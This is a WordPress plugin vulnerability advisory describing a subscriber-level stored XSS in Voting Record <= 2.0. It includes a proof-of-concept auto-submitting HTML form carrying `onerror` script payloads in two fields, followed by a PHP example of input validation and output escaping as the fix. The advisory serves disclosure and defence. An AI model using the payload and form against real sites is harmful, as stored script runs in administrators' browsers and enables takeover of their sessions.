WordPress Plugin Vulnerabilities
Voting Record <= 2.0 - Subscriber+ Stored XSS
Description
The plugin is missing sanitisation as well as escaping, which could allow any authenticated user, such as a subscriber, to perform Stored XSS attacks.
Proof of Concept
Have a subscriber open an HTML file containing the following:

```
<form action="http://localhost:8888/wordpress/wp-admin/index.php" method="POST">
  <input type="text" name="bill" value="1">
  <input type="text" name="description" value='subscriber"><img src=x onerror=alert(19)>'>
  <input type="text" name="vote" value="Yea">
  <input type="text" name="voter" value='subscriber"><img src=x onerror=alert(20)>'>
  <input type="text" name="date" value="2022-12-10">
  <input type="text" name="result" value="pass">
  <input type="text" name="tally" value="3">
  <input type="text" name="record_vote" value="Save">
</form>
<script>
  document.forms[0].submit();
</script>
```

See the XSS when logged in as an admin and viewing recorded votes.
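The two controls the Description reports as missing, validation on input and escaping on output, applied to the field values from the proof of concept. This is an added example in plain PHP, not the plugin's code; the function names and the allowlists for `vote` and `result` are assumptions.

```php
<?php
// Added example, not the plugin's code. Field names come from the PoC form;
// function names and allowlist values are assumptions made for illustration.

// Input side: validate each field to its expected shape before storing it.
function vr_clean_vote(array $post): ?array {
    $text = function ($v): string {
        // Plain text only: strip tags and control characters.
        // In WordPress, sanitize_text_field( wp_unslash( $v ) ) plays this role.
        return trim(preg_replace('/[\x00-\x1F\x7F]/', '', strip_tags((string) $v)));
    };
    $date   = (string) ($post['date'] ?? '');
    $parsed = DateTime::createFromFormat('Y-m-d', $date);
    $vote   = $post['vote'] ?? '';
    $result = $post['result'] ?? '';
    if (!$parsed || $parsed->format('Y-m-d') !== $date
        || !in_array($vote, ['Yea', 'Nay'], true)        // assumed allowlist
        || !in_array($result, ['pass', 'fail'], true)    // assumed allowlist
        || !ctype_digit((string) ($post['bill'] ?? ''))
        || !ctype_digit((string) ($post['tally'] ?? ''))) {
        return null; // reject the whole record rather than storing part of it
    }
    return [
        'bill' => (int) $post['bill'], 'tally' => (int) $post['tally'],
        'vote' => $vote, 'result' => $result, 'date' => $date,
        'description' => $text($post['description'] ?? ''),
        'voter'       => $text($post['voter'] ?? ''),
    ];
}

// Output side: escape every value where it is written into HTML, even if it
// was sanitised on input. In WordPress use esc_html() / esc_attr().
function vr_render_row(array $rec): string {
    $cells = '';
    foreach (['bill', 'description', 'vote', 'voter', 'date', 'result', 'tally'] as $key) {
        $cells .= '<td>' . htmlspecialchars((string) $rec[$key], ENT_QUOTES, 'UTF-8') . '</td>';
    }
    return "<tr>$cells</tr>";
}

// Constructed input: the field values from the proof of concept above.
$poc = ['bill' => '1', 'vote' => 'Yea', 'date' => '2022-12-10', 'result' => 'pass',
        'tally' => '3', 'record_vote' => 'Save',
        'description' => 'subscriber"><img src=x onerror=alert(19)>',
        'voter'       => 'subscriber"><img src=x onerror=alert(20)>'];

echo vr_render_row(vr_clean_vote($poc)), "\n"; // validated on input, escaped on output
echo vr_render_row($poc), "\n";                // a row stored before the fix: escaping alone
```

The second call shows why output escaping is needed in addition to input sanitisation: records already stored in the database before a fix never pass through the input path.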
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-10 (about 4 months ago)
Added
2024-01-10 (about 4 months ago)
Last Updated
2024-01-10 (about 4 months ago)